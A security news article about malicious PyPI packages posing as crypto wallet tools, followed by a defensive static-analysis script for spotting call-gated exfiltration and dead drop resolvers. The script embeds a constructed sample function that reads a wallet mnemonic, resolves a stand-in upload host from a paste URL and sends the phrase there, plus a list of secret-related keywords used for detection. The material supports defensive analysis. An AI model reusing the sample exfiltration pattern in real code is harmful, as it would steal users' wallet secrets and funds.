A new set of malicious packages has been unearthed in the Python Package Index (PyPI) repository that masqueraded as cryptocurrency wallet recovery and management services, only to siphon sensitive data and facilitate the theft of valuable digital assets.

"The attack targeted users of Atomic, Trust Wallet, Metamask, Ronin, TronLink, Exodus, and other prominent wallets in the crypto ecosystem," Checkmarx researcher Yehuda Gelb said in a Tuesday analysis.

Checkmarx said the packages were named so in a deliberate attempt to lure developers working in the cryptocurrency ecosystem. However, they harbor functionality to steal private keys, mnemonic phrases, and other sensitive wallet data, such as transaction histories or wallet balances.

Six of the identified PyPI packages included a dependency called cipherbcryptors to execute the malicious code, while a few others relied on an additional package named ccl_leveldbases in an apparent effort to obfuscate the functionality.

A notable aspect of the packages is that the malicious functionality is triggered only when certain functions are called, marking a departure from the typical pattern where such behavior would be activated automatically upon installation. Because nothing happens at install or import time, a sandbox that only runs the package's setup step will see no network activity at all.

The packages also avoid hard-coding the address of the server that receives the stolen data, resolving it at run time instead. This technique, called a dead drop resolver, gives the attackers the flexibility to update the server information without having to push out an update to the packages themselves.

The deception didn't stop there, for the threat actor behind the campaign also managed to display fake download statistics, giving users the impression that the packages were popular and trustworthy.

"The attack exploits the trust in open-source communities and the apparent utility of wallet management tools, potentially affecting a broad spectrum of cryptocurrency users," Gelb said.

The development is just the latest in a series of malicious campaigns targeting the cryptocurrency sector, with threat actors constantly on the lookout for new ways to drain funds from victim wallets.

In August 2024, details emerged of a sophisticated cryptocurrency scam operation dubbed CryptoCore that involves using fake videos or hijacked accounts on social media platforms like Facebook, Twitch, X, and YouTube to lure users into parting with their cryptocurrency assets under the guise of quick and easy profits.

"This scam group and its giveaway campaigns leverage deepfake technology, hijacked YouTube accounts, and professionally designed websites to deceive users into sending their cryptocurrencies to the scammers' wallets," Avast researcher Martin Chlumecký said.

Last week, Check Point shed light on a rogue Android app that impersonated the legitimate WalletConnect open-source protocol to steal approximately $70,000 in cryptocurrency by initiating fraudulent transactions from infected devices.
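Two of the behaviours described above, the payload that only fires when a particular function is called and the dead drop resolver that looks up the exfiltration server at run time, are exactly the things an install-time sandbox misses. The following static triage script is an added example and is not Checkmarx's tooling or code from the packages themselves. It parses Python source with the standard `ast` module and reports three things: network calls at module level (the classic import/install-time trigger), functions that both touch wallet secret material and reach the network (the call-time trigger), and network calls whose destination is built from the result of an earlier network call (the dead drop pattern). The two sample modules, their function names, URLs and hosts are all constructed for the example; the heuristics (`NETWORK_CALLS`, `SECRET_WORDS`) are assumptions to tune for your own review, not an authoritative signature.

```python
import ast

# Constructed sample module (not a real PyPI package): the "decoder" only reaches the
# network when decode_mnemonic() is called, and the upload host is fetched from a
# paste-style URL first (dead drop) instead of being written into the source.
SAMPLE_GATED = '''
import json
import urllib.request

def decode_mnemonic(wallet_path):
    phrase = json.loads(open(wallet_path).read())["mnemonic"]
    server = urllib.request.urlopen("https://paste.example/raw/abc123").read().decode()
    urllib.request.urlopen("https://" + server + "/collect", data=phrase.encode())
    return phrase
'''

# Constructed counter-example: the install/import-time pattern, where the network
# call sits at module level and runs as soon as the module is imported.
SAMPLE_IMPORT_TIME = '''
import urllib.request
urllib.request.urlopen("https://203.0.113.7/beacon")
'''

# Assumed heuristics: bare names of common network entry points and substrings that
# suggest wallet secret material. Extend both for the libraries a package actually uses.
NETWORK_CALLS = {"urlopen", "get", "post", "request", "create_connection", "connect"}
SECRET_WORDS = ("mnemonic", "seed", "private_key", "privkey", "keystore", "wallet")


def _call_name(call):
    """Bare name of the callee, e.g. 'urlopen' for urllib.request.urlopen(...)."""
    func = call.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""


def _network_calls(node):
    return [n for n in ast.walk(node)
            if isinstance(n, ast.Call) and _call_name(n) in NETWORK_CALLS]


def _touches_secrets(node):
    """True if any identifier, parameter, attribute or string literal mentions secret material."""
    for n in ast.walk(node):
        text = ""
        if isinstance(n, ast.Name):
            text = n.id
        elif isinstance(n, ast.arg):
            text = n.arg
        elif isinstance(n, ast.Attribute):
            text = n.attr
        elif isinstance(n, ast.Constant) and isinstance(n.value, str):
            text = n.value
        if any(w in text.lower() for w in SECRET_WORDS):
            return True
    return False


def _dead_drop(fn):
    """A network call whose first argument is built from a name assigned from an earlier network call."""
    derived = set()
    for node in ast.walk(fn):
        if isinstance(node, ast.Assign) and _network_calls(node.value):
            derived.update(t.id for t in node.targets if isinstance(t, ast.Name))
    for call in _network_calls(fn):
        if call.args and any(isinstance(n, ast.Name) and n.id in derived
                             for n in ast.walk(call.args[0])):
            return True
    return False


def analyze(source):
    """Return a triage report for one module's source text."""
    tree = ast.parse(source)
    report = {"import_time_network": False, "gated_exfil": [], "dead_drop": []}
    # Module-level statements run on import (and, in setup.py, during installation).
    for stmt in tree.body:
        if (not isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef))
                and _network_calls(stmt)):
            report["import_time_network"] = True
    # Function bodies run only when something calls them, which is what the packages rely on.
    for fn in ast.walk(tree):
        if not isinstance(fn, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        if _network_calls(fn) and _touches_secrets(fn):
            report["gated_exfil"].append(fn.name)
        if _dead_drop(fn):
            report["dead_drop"].append(fn.name)
    return report


if __name__ == "__main__":
    for label, src in (("gated", SAMPLE_GATED), ("import-time", SAMPLE_IMPORT_TIME)):
        print(label, analyze(src))
```

Run it over every `.py` file in an unpacked sdist or wheel before the package is installed, and treat a `gated_exfil` or `dead_drop` hit as a reason to read the function by hand rather than as a verdict; obfuscated or dynamically imported code, and a resolver hidden in a dependency such as the ones the article names, will not be visible to a single-file parse, so the dependency tree has to be scanned too.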
Originally published on thehackernews.com on Wed, 02 Oct 2024 06:43:07 +0000.